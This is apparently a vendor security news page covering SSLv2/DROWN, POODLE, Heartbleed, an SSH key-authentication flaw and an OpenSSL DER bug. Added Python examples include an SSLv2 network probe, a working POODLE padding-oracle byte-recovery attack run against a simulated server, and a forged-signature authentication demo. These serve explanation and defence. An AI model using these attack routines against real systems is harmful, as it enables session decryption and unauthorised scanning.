News from the security category

The DROWN Attack and SFTPPlus

Thu 03 March 2016 | security

SFTPPlus Server versions 1.6 and newer are not vulnerable to the DROWN attack (CVE-2016-0800).

SFTPPlus versions 3 and newer are also not vulnerable to it.

The DROWN attack is carried out against servers that still accept SSLv2, so there is nothing to fix in SFTPPlus Client. Keep in mind, though, that DROWN decrypts TLS sessions to a vulnerable server regardless of which client produced them, so the servers your clients connect to should be checked as well.

SFTPPlus relies on OpenSSL for the SSL and TLS layer of its FTPS and HTTPS implementations. The Unix and Linux versions of SFTPPlus use the OpenSSL libraries provided by the operating system, while the Windows versions use the OpenSSL libraries included with the product.

Support for SSL version 2 was never available in SFTPPlus, so SFTPPlus users are not exposed to any vulnerability related to SSLv2. Moreover, SSL and TLS security contexts are always created with the NO_SSLv2 option, so even on a system whose OpenSSL build still supports SSLv2, that protocol version is explicitly denied by SFTPPlus. The check worth making is on other services sharing the host: DROWN needs only one SSLv2-capable service that uses the same RSA private key as the TLS service being attacked, for instance a legacy mail or web server configured with the same certificate.

The SFTP protocol runs over SSH rather than SSL/TLS and is not affected by SSL or TLS bugs.
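A way to verify the claim above against your own FTPS or HTTPS endpoints, as an added example that is not part of the original post or of SFTPPlus: the script below sends a hand-built SSLv2 CLIENT-HELLO, because current OpenSSL builds cannot speak SSLv2 at all and `openssl s_client -ssl2` is normally unavailable, and then classifies the reply. A SERVER-HELLO means SSLv2 is accepted and DROWN is in scope; a TLS alert or a dropped connection means it is refused. It also lists the SSLv2 ciphers the server offers, since the 40-bit export ones make the attack far cheaper. Host, port and the explicit-FTPS AUTH SSL upgrade are the caller's choice, and the sample SERVER-HELLO is constructed for offline testing. Only run it against servers you are authorised to test.

```python
"""Added example, not SFTPPlus code: probe a server for SSLv2 support, the DROWN precondition.

Sends an SSLv2 CLIENT-HELLO and classifies the reply: a SERVER-HELLO means SSLv2 is enabled,
a TLS alert or a closed socket means it is refused.
"""
import socket
import struct

MSG_CLIENT_HELLO = 0x01
MSG_SERVER_HELLO = 0x04
# SSLv2 cipher kinds with their OpenSSL names; the EXP-* kinds are 40-bit export ciphers.
SSLV2_CIPHERS = {
    b"\x01\x00\x80": "RC4-MD5",
    b"\x02\x00\x80": "EXP-RC4-MD5",
    b"\x03\x00\x80": "RC2-CBC-MD5",
    b"\x04\x00\x80": "EXP-RC2-CBC-MD5",
    b"\x05\x00\x80": "IDEA-CBC-MD5",
    b"\x06\x00\x40": "DES-CBC-MD5",
    b"\x07\x00\xc0": "DES-CBC3-MD5",
}


def build_sslv2_client_hello(challenge=b"\x11" * 16):
    """SSLv2 record: 2-byte header with the high bit set (no padding byte), then the message."""
    ciphers = b"".join(SSLV2_CIPHERS)
    body = (bytes([MSG_CLIENT_HELLO]) + b"\x00\x02"                   # CLIENT-VERSION 0x0002
            + struct.pack(">HHH", len(ciphers), 0, len(challenge))    # cipher-specs, session-id, challenge lengths
            + ciphers + challenge)
    return struct.pack(">H", 0x8000 | len(body)) + body


def classify_response(data):
    """Describe what the server answered to the CLIENT-HELLO."""
    if not data:
        return {"kind": "closed", "sslv2": False}
    if data[0] == 0x15:                                   # TLS alert record: SSLv2 refused
        return {"kind": "tls-alert", "sslv2": False}
    if data[0] & 0x80 and len(data) >= 13 and data[2] == MSG_SERVER_HELLO:
        # SERVER-HELLO after the 2-byte header: type(1) session-id-hit(1) cert-type(1)
        # version(2) cert-len(2) cipher-specs-len(2) conn-id-len(2), then cert, specs, conn-id.
        cert_len, specs_len, _conn_id_len = struct.unpack_from(">HHH", data, 7)
        specs = data[13 + cert_len:13 + cert_len + specs_len]
        names = [SSLV2_CIPHERS.get(bytes(specs[i:i + 3]), specs[i:i + 3].hex())
                 for i in range(0, len(specs), 3)]
        return {"kind": "sslv2-server-hello", "sslv2": True, "ciphers": names,
                "export_ciphers": any(n.startswith("EXP-") for n in names)}
    return {"kind": "unknown", "sslv2": False}


def probe(host, port, explicit_ftps=False, timeout=5.0):
    """Connect, optionally upgrade an explicit FTPS session with AUTH SSL, then send the hello."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if explicit_ftps:
            sock.recv(1024)                                # 220 banner
            sock.sendall(b"AUTH SSL\r\n")
            if not sock.recv(1024).startswith(b"234"):
                return {"kind": "auth-ssl-refused", "sslv2": False}
        sock.sendall(build_sslv2_client_hello())
        try:
            reply = sock.recv(4096)
        except (socket.timeout, ConnectionResetError):
            reply = b""
    return classify_response(reply)


def sample_server_hello():
    """Constructed SERVER-HELLO offering RC4-MD5 and EXP-RC4-MD5, for offline testing only."""
    cert = b"\x30\x03\x02\x01\x01"                         # placeholder bytes, not a real certificate
    specs = b"\x01\x00\x80\x02\x00\x80"
    body = (bytes([MSG_SERVER_HELLO]) + b"\x00" + b"\x01" + b"\x00\x02"
            + struct.pack(">HHH", len(cert), len(specs), 16) + cert + specs + b"\x22" * 16)
    return struct.pack(">H", 0x8000 | len(body)) + body


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1], int(sys.argv[2]), explicit_ftps="--explicit" in sys.argv))
```

Use `python probe.py host 990` for implicit FTPS or HTTPS on 443, and `python probe.py host 21 --explicit` for explicit FTPS, where the hello must follow the AUTH SSL upgrade. A result with `"sslv2": True` and `"export_ciphers": True` is the worst case described in the DROWN paper.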

• • •

SSLv3 POODLE vulnerability and SFTPPlus

Wed 22 October 2014 | security server client

Issue

In late September, a team at Google discovered a serious vulnerability in SSL 3.0, known as “POODLE” (CVE-2014-3566).

By exploiting this vulnerability, an attacker who can intercept and modify traffic between client and server can recover data, such as session cookies, sent over what is supposed to be a secured connection.

Affected protocols

SFTPPlus Server and Client are affected by the SSLv3 POODLE vulnerability when using the FTPS and HTTPS protocols, as is the HTTPS web based management tool.

SFTP and SCP protocols are not affected.

This is a design flaw in the SSLv3 protocol itself; it is not specific to the SFTPPlus implementation or to any other vendor's.
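To see why this is a protocol flaw rather than an implementation bug, here is a simulation of the padding oracle, added here and not taken from the original post or from SFTPPlus. It uses a toy HMAC-based block cipher so that it runs with the Python standard library alone; the keys, the secret and the request shape are constructed. The oracle does exactly what SSLv3 specifies: read the padding length byte, strip, verify the MAC. Because the padding bytes themselves are never checked, an attacker who can make the victim's client resend a request with a chosen prefix and body length, and who can alter ciphertext in transit, recovers the secret one byte per roughly 256 requests.

```python
"""Added example, not SFTPPlus code: the SSLv3 padding oracle behind POODLE.

SSLv3 CBC records are MAC-then-pad-then-encrypt and the receiver checks only the final byte
(the padding length). The attacker copies a target ciphertext block into the padding slot;
when the server accepts, the last byte of that block's decryption is known. The cipher is a
toy 16-byte Feistel network over HMAC-SHA256; the attack does not depend on the block cipher.
"""
import hashlib
import hmac
import os

BLOCK = 16
MAC_LEN = 20                                    # SHA-1 sized MAC, as in the SSLv3 *-SHA suites

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):
    return hmac.new(key + bytes([i]), half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right

def cbc_encrypt(key, iv, plain):
    out, prev = [], iv
    for i in range(0, len(plain), BLOCK):
        prev = block_encrypt(key, _xor(plain[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, cipher):
    out, prev = [], iv
    for i in range(0, len(cipher), BLOCK):
        out.append(_xor(block_decrypt(key, cipher[i:i + BLOCK]), prev))
        prev = cipher[i:i + BLOCK]
    return b"".join(out)

def sslv3_encrypt_record(enc_key, mac_key, data):
    """MAC, then pad with arbitrary bytes whose last byte is (padding total - 1), then CBC-encrypt."""
    mac = hmac.new(mac_key, data, hashlib.sha1).digest()
    pad_total = BLOCK - (len(data) + MAC_LEN) % BLOCK      # 1..16: a block-aligned body gets a full block
    padding = os.urandom(pad_total - 1) + bytes([pad_total - 1])
    iv = os.urandom(BLOCK)                                  # real SSLv3 chains from the previous record
    return iv + cbc_encrypt(enc_key, iv, data + mac + padding)

def sslv3_server_accepts(enc_key, mac_key, record):
    """The oracle: an SSLv3 receiver. Only the padding length byte is checked before the MAC."""
    plain = cbc_decrypt(enc_key, record[:BLOCK], record[BLOCK:])
    pad_total = plain[-1] + 1
    if pad_total > BLOCK or pad_total + MAC_LEN > len(plain):
        return False
    data, mac = plain[:-(pad_total + MAC_LEN)], plain[-(pad_total + MAC_LEN):-pad_total]
    return hmac.compare_digest(hmac.new(mac_key, data, hashlib.sha1).digest(), mac)

def poodle_recover(secret_len, client_send, server_accepts, max_tries=20000):
    """client_send(prefix_len, tail_len) returns a fresh record encrypting prefix + secret + tail."""
    recovered = bytearray()
    for j in range(secret_len):
        prefix = (BLOCK - 1 - j) % BLOCK                        # secret[j] lands at offset 15 of a block
        target = (prefix + j) // BLOCK                          # index of that block within the data
        tail = -(prefix + secret_len + MAC_LEN) % BLOCK         # data + MAC block aligned: 16 padding bytes
        for _ in range(max_tries):
            record = client_send(prefix, tail)
            blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]   # blocks[0] is the IV
            c_target, c_prev, c_before_last = blocks[target + 1], blocks[target], blocks[-2]
            blocks[-1] = c_target                               # the target block now sits in the padding slot
            if server_accepts(b"".join(blocks)):
                # accepted <=> D(c_target)[15] ^ c_before_last[15] == 15; undo the original chaining:
                recovered.append(15 ^ c_before_last[15] ^ c_prev[15])
                break
        else:
            raise RuntimeError("oracle never accepted in %d tries" % max_tries)
    return bytes(recovered)

def demo(secret=b"sid=7f3a9c1e"):
    """Victim client, attacker-chosen request shape, SSLv3 server: recovers `secret` byte by byte."""
    enc_key, mac_key = os.urandom(16), os.urandom(16)      # constructed session keys

    def victim_client(prefix_len, tail_len):                # the attacker's JavaScript in the real attack
        return sslv3_encrypt_record(enc_key, mac_key, b"/" * prefix_len + secret + b"x" * tail_len)

    return poodle_recover(len(secret), victim_client,
                          lambda record: sslv3_server_accepts(enc_key, mac_key, record))

if __name__ == "__main__":
    print(demo())
```

TLS 1.0 and later require every padding byte to equal the padding length, which is why the same tampering is rejected there and why the advice that follows is to allow only TLSv1. The RC4 workaround below avoids the problem by not using CBC at all.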

Solution for SFTPPlus Server

The fix is to disable the SSLv3 protocol and allow only TLSv1 for FTPS (explicit or implicit) and HTTPS, including the Local Manager web based administration interface.

In SFTPPlus Server this is done with the ssl_allowed_methods = tlsv1 configuration option, set for every affected protocol. For more details see the ssl_allowed_methods documentation.

The default configuration supports both SSLv3 and TLSv1. SSLv2 was never enabled, as that protocol had already been shown to be insecure.

If you still need SSLv3, disable the CBC based cipher suites instead. In practice this means allowing only the RC4-SHA cipher, the one available cipher that does not use CBC mode: set ssl_cipher_list = RC4-SHA. For more details see the ssl_cipher_list documentation. Treat this as a stopgap only: RC4 has known statistical weaknesses of its own, so disabling SSLv3 remains the real fix.

We will soon release a new version of SFTPPlus Server which will disable SSLv3 by default.

Solution for SFTPPlus Client

SFTPPlus Client can likewise be restricted to the RC4-SHA cipher using the ciphers = 'RC4-SHA' configuration option, with the same caveat about RC4. For more details see the ciphers documentation.

We will soon release a new version of SFTPPlus Client which will disable SSLv3 by default.

• • •

OpenSSL Heartbleed bug and SFTPPlus

Thu 17 April 2014 | security server

SFTPPlus uses OpenSSL only for the FTPS protocol. The SFTP protocol does not use OpenSSL and is not affected by this bug (CVE-2014-0160).

On Unix and Linux, SFTPPlus uses the OpenSSL library provided by the operating system. The Unix and Linux operating systems supported by SFTPPlus (RHEL 4, RHEL 5, RHEL 6, SLES 11, AIX 5.3) ship OpenSSL versions older than 1.0.1 and are not affected by this bug. One caveat: RHEL 6.5 moved to OpenSSL 1.0.1e, which is affected, and Red Hat has published a fixed package, so on RHEL 6 confirm that the installed openssl package carries the fix for CVE-2014-0160. The version string stays 1.0.1e after the fix, so rpm -q --changelog openssl, not openssl version, is the reliable check.

If you use CentOS 6 instead of RHEL 6 you might be affected by this problem and should update the system; if you use Ubuntu 12.04 you should also update the operating system. Security fixes are already available for both CentOS and Ubuntu. A running process keeps using the old library until it is restarted, so restart SFTPPlus after the update. If an affected build was exposed, also consider that the server's private key may have been disclosed and reissue its certificate.

For Windows, SFTPPlus ships with OpenSSL version 0.9.8, which predates the TLS heartbeat extension code and is not affected by this bug.
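The practical check that follows from the above, as an added example in Python rather than anything from the original post or from SFTPPlus: classify an `openssl version` line against the affected range (1.0.1 through 1.0.1f and 1.0.2-beta1) and, because distributions backport the fix without bumping the version string (a patched RHEL or CentOS 6.5 still reports 1.0.1e), also look for CVE-2014-0160 in the RPM changelog. The sample version lines and changelog text are constructed.

```python
"""Added example, not SFTPPlus code: classify an OpenSSL build against Heartbleed (CVE-2014-0160).

Upstream, 1.0.1 through 1.0.1f and 1.0.2-beta1 are affected; 0.9.8 and 1.0.0 never had the TLS
heartbeat code. Distributions backport the fix without changing the version string, so on RPM
systems the package changelog is the signal that matters, which is why it is a second input.
"""
import re
import subprocess

_VERSION_RE = re.compile(r"OpenSSL\s+(\d+)\.(\d+)\.(\d+)([a-z]*)(-beta\d+)?")


def heartbleed_status(version_line, changelog=""):
    """Return 'not-affected', 'affected' or 'patched' for the output of `openssl version`."""
    match = _VERSION_RE.search(version_line)
    if not match:
        raise ValueError("unrecognised version line: %r" % version_line)
    release = tuple(int(x) for x in match.group(1, 2, 3))
    letter, beta = match.group(4), match.group(5) or ""
    upstream_affected = ((release == (1, 0, 1) and letter <= "f")
                         or (release == (1, 0, 2) and beta == "-beta1"))
    if not upstream_affected:
        return "not-affected"
    if "CVE-2014-0160" in changelog:       # a distro backport names the CVE in its changelog
        return "patched"
    return "affected"


def local_status():
    """Inspect the OpenSSL on PATH; on RPM systems also read the package changelog.

    On Windows, inspect the OpenSSL DLLs shipped with SFTPPlus instead of whatever is on PATH.
    """
    version = subprocess.run(["openssl", "version"], capture_output=True, text=True, check=True).stdout
    try:
        changelog = subprocess.run(["rpm", "-q", "--changelog", "openssl"],
                                   capture_output=True, text=True).stdout
    except FileNotFoundError:
        changelog = ""
    return heartbleed_status(version, changelog)


if __name__ == "__main__":
    print(local_status())
```

A result of `affected` on a Debian or Ubuntu system can still be a false alarm for the same backporting reason; there, `dpkg -s libssl1.0.0` and the distribution's security tracker give the answer.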

• • •

Security vulnerability for SSH keys authentication

Mon 22 April 2013 | server security

Monday, 22 April 2013 - we have discovered a security vulnerability affecting SFTPPlus Server versions 1.6, 1.7 and 1.8.

Due to an error in checking the SSH key signature when SSH key authentication is used for an SFTP transfer, a user can obtain server access using only the public part of the SSH key.

Access with only a public SSH key is still restricted to the specific account for which the public key is enabled. Full server access is not granted.

To exploit this issue, a third party needs a copy of the public SSH key and a modified SFTP client that starts an SFTP session without the matching private key. Note that public keys are not treated as secrets and are often distributed to several systems, so their confidentiality should not be relied upon.

This does not affect SFTP transfers for which SSH key authentication is not enabled.

This does not affect FTP or FTPS transfers.

This does not affect SFTPPlus Server version 1.5 and below.

This does not affect SFTPPlus Client at any version.
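For readers who want to see what the check must look like, here is a model of RFC 4252 public-key authentication done correctly, beside the failure class described above, added here and not SFTPPlus's own code. Textbook RSA over Python integers stands in for ssh-rsa so the script runs on the standard library alone; the user name, session id and keys are constructed. The point is in `authenticate_fixed`: the key being authorised for the account is only the first condition, and the signature over the session id and request fields must verify as well, which also stops a captured signature from being replayed into another connection.

```python
"""Added example, not SFTPPlus code: RFC 4252 public-key authentication checked properly.

Models the failure class in this advisory: a server that grants access because the offered public
key is authorised, without verifying the signature proving possession of the private key. Textbook
RSA over Python integers stands in for ssh-rsa; it is not a signature scheme to reuse.
"""
import hashlib
import random
import struct

SSH_MSG_USERAUTH_REQUEST = 50

def ssh_string(data):
    return struct.pack(">I", len(data)) + data

def userauth_signed_data(session_id, user, service, algo, pubkey_blob):
    """RFC 4252 section 7: the bytes the client signs. The session id ties them to one connection."""
    return (ssh_string(session_id) + bytes([SSH_MSG_USERAUTH_REQUEST]) + ssh_string(user)
            + ssh_string(service) + ssh_string(b"publickey") + b"\x01" + ssh_string(algo)
            + ssh_string(pubkey_blob))

def _is_probable_prime(n, rounds=20):
    """Miller-Rabin; adequate for a demo key."""
    if n < 4 or n % 2 == 0:
        return n in (2, 3)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits):
    while True:
        candidate = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(candidate):
            return candidate

def rsa_keygen(bits=512):
    """Returns ((e, n), (d, n)). 512 bits keeps the demo quick and is far too small for real use."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        if p != q and (p - 1) * (q - 1) % e:
            return (e, p * q), (pow(e, -1, (p - 1) * (q - 1)), p * q)

def _int_bytes(x):
    return x.to_bytes((x.bit_length() + 7) // 8, "big")

def pubkey_to_blob(pub):
    """Wire form of the key, in the style of an ssh-rsa blob: algorithm name, then e and n."""
    return ssh_string(b"toy-rsa") + ssh_string(_int_bytes(pub[0])) + ssh_string(_int_bytes(pub[1]))

def rsa_sign(priv, data):
    d, n = priv
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return pow(digest, d, n).to_bytes((n.bit_length() + 7) // 8, "big")

def rsa_verify(pub, data, sig):
    e, n = pub
    if len(sig) != (n.bit_length() + 7) // 8:
        return False
    return pow(int.from_bytes(sig, "big"), e, n) == int.from_bytes(hashlib.sha256(data).digest(), "big")

def authenticate_vulnerable(req, authorized):
    """Grants access to anyone presenting an authorised public key: the bug class described above."""
    return req["pubkey_blob"] in authorized.get(req["user"], {})

def authenticate_fixed(req, authorized, session_id):
    """The key must be authorised for the account AND the signature over this session's data must verify."""
    pub = authorized.get(req["user"], {}).get(req["pubkey_blob"])
    if pub is None or not req.get("signature"):
        return False          # no signature is RFC 4252's "is this key acceptable?" query, never a login
    data = userauth_signed_data(session_id, req["user"], req["service"], req["algo"], req["pubkey_blob"])
    return rsa_verify(pub, data, req["signature"])

def demo():
    """Legitimate client versus an attacker who holds only the public key (constructed scenario)."""
    pub, priv = rsa_keygen()
    blob = pubkey_to_blob(pub)
    authorized = {b"alice": {blob: pub}}                 # alice's authorised keys, parsed at load time
    session_id = b"S" * 32                               # from key exchange; unique per connection
    req = {"user": b"alice", "service": b"ssh-connection", "algo": b"toy-rsa", "pubkey_blob": blob}
    to_sign = userauth_signed_data(session_id, req["user"], req["service"], req["algo"], blob)
    legit = dict(req, signature=rsa_sign(priv, to_sign))
    forged = dict(req, signature=b"\x00" * 64)           # attacker: public key only, signature guessed
    return {
        "legit_fixed": authenticate_fixed(legit, authorized, session_id),
        "forged_vulnerable": authenticate_vulnerable(forged, authorized),
        "forged_fixed": authenticate_fixed(forged, authorized, session_id),
        "replayed_fixed": authenticate_fixed(legit, authorized, b"T" * 32),
    }
```

The vulnerable path still limits the attacker to the account whose authorised key list contains the blob, matching the scope stated above; the fixed path rejects both the forged signature and a valid signature replayed under a different session id.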

Available fix

To fix this error we have released new versions of SFTPPlus Server for all supported release series.

Update for release series 1.8 together with documentation is available at:

http://www.sftpplus.com/downloads/server/1.8.6.html

http://www.sftpplus.com/documentation/server/v/1.8.6/

Update for release series 1.7 together with documentation is available at:

http://www.sftpplus.com/downloads/server/1.7.21.html

http://www.sftpplus.com/documentation/server/v/1.7.21/

Users of version 1.6 are asked to upgrade to the latest version, 1.8.6. Besides the security fix, upgrading to 1.8.6 also provides other fixes and new features.

In case you are not able to upgrade to one of the latest supported versions, please let us know and we will work together in making sure this security error is fixed for your production servers.

We apologize for any inconvenience that may occur as a result of these changes!

• • •

OpenSSL DER certificate vulnerability and SFTPPlus

Thu 26 April 2012 | security

Last week a bug was discovered that affects all OpenSSL versions (CVE-2012-2110, in the ASN.1 DER decoding code). Decoding crafted DER data can corrupt memory, which can crash the process or possibly lead to code execution.

More information about the original vulnerability report for OpenSSL can be found at the National Cyber Awareness System.

The OpenSSL team had already released a fix as of 24 April 2012.

Please note that the bug only affects products that use OpenSSL to read client or server certificates stored in DER format, and only when those certificates come from an untrusted source, such as a Certificate Authority you do not control.

The vulnerability does not apply to certificates stored in PEM format.

The vulnerability only affects the FTPS and HTTPS transfers of SFTPPlus products, since SFTPPlus Client and SFTPPlus Server read client and server certificates in various formats, including DER. If the DER certificate was issued by a trustworthy Certificate Authority, this bug causes no security vulnerability.

The vulnerability is easier to exploit on Intel x86 and x86_64 CPU architectures, as other CPU architectures have various security mechanisms that make this type of vulnerability harder to exploit.
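Two practical measures suggested by the above, as an added example that is not part of the original post or of SFTPPlus: check the DER framing of an untrusted certificate file before it reaches OpenSSL, and hand the bytes over in PEM form, which the advisory states is not affected (PEM is the same DER, base64 wrapped between BEGIN/END markers). The walker checks only TLV framing, not X.509 content; the sample DER is a constructed minimal SEQUENCE, not a real certificate.

```python
"""Added example, not SFTPPlus code: sanity-check DER input before the TLS library sees it, and
convert it to PEM, the format the advisory above says is unaffected.

The walker enforces the DER length rules a decoder must not get wrong: no indefinite lengths, no
over-wide or non-minimal length fields, and no element longer than the buffer that contains it.
"""
import base64
import ssl


def is_pem(data):
    return data.lstrip().startswith(b"-----BEGIN ")


def check_der_certificate(der):
    """Walk every TLV in `der`; raise ValueError on the first framing violation."""
    def walk(start, end):
        pos = start
        while pos < end:
            if end - pos < 2:
                raise ValueError("truncated TLV header at offset %d" % pos)
            tag, first = der[pos], der[pos + 1]
            pos += 2
            if tag & 0x1F == 0x1F:
                raise ValueError("high tag number form is not used in X.509")
            if first < 0x80:                                   # short form
                length = first
            else:                                              # long form: 0x80 | width, then width bytes
                width = first & 0x7F
                if width == 0:
                    raise ValueError("indefinite length is BER, not DER")
                if width > 4 or end - pos < width:
                    raise ValueError("bad length field at offset %d" % pos)
                length = int.from_bytes(der[pos:pos + width], "big")
                if length < 0x80 or der[pos] == 0:
                    raise ValueError("non-minimal length encoding at offset %d" % pos)
                pos += width
            if length > end - pos:
                raise ValueError("length %d overruns its container at offset %d" % (length, pos))
            if tag & 0x20:                                     # constructed: check the contents too
                walk(pos, pos + length)
            pos += length
    if not der or der[0] != 0x30:
        raise ValueError("a certificate is a top-level SEQUENCE")
    walk(0, len(der))
    return True


def is_well_formed_der(der):
    try:
        return check_der_certificate(der)
    except ValueError:
        return False


def der_to_pem(der, label="CERTIFICATE"):
    """PEM is base64 of the same DER bytes, 64 characters per line, between BEGIN/END markers."""
    b64 = base64.b64encode(der).decode("ascii")
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return "-----BEGIN %s-----\n%s\n-----END %s-----\n" % (label, body, label)


def pem_round_trips(der):
    """Cross-check with the standard library's own PEM parser."""
    return ssl.PEM_cert_to_DER_cert(der_to_pem(der)) == der


def load_certificate_bytes(raw):
    """Accept PEM as-is; accept DER only after the framing check, and hand it on as PEM."""
    if is_pem(raw):
        return raw
    check_der_certificate(raw)
    return der_to_pem(raw).encode("ascii")


# Constructed sample: SEQUENCE { INTEGER 1, OCTET STRING "ab" }, not a real certificate.
SAMPLE_DER = bytes.fromhex("300702010104026162")
```

`load_certificate_bytes` is the piece to put in front of whatever eventually calls into OpenSSL: a file that fails the walk is rejected before the library parses it, and one that passes is handed over as PEM, the path the advisory identifies as unaffected. The framing check rejects the shapes a crafted file relies on (lengths larger than the data, indefinite or non-minimal lengths), but a certificate that passes it can still be invalid X.509.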

We found it appropriate to let you know about this security issue while we work on including the fix in the latest SFTPPlus products.

New releases of the latest SFTPPlus products will be available in the near future and will include a fix for the security issue described above.

If you are handling untrusted .DER certificates with an older version of SFTPPlus products and cannot upgrade to the latest version, please let us know and we will provide a security update for the version used in your deployment.

• • •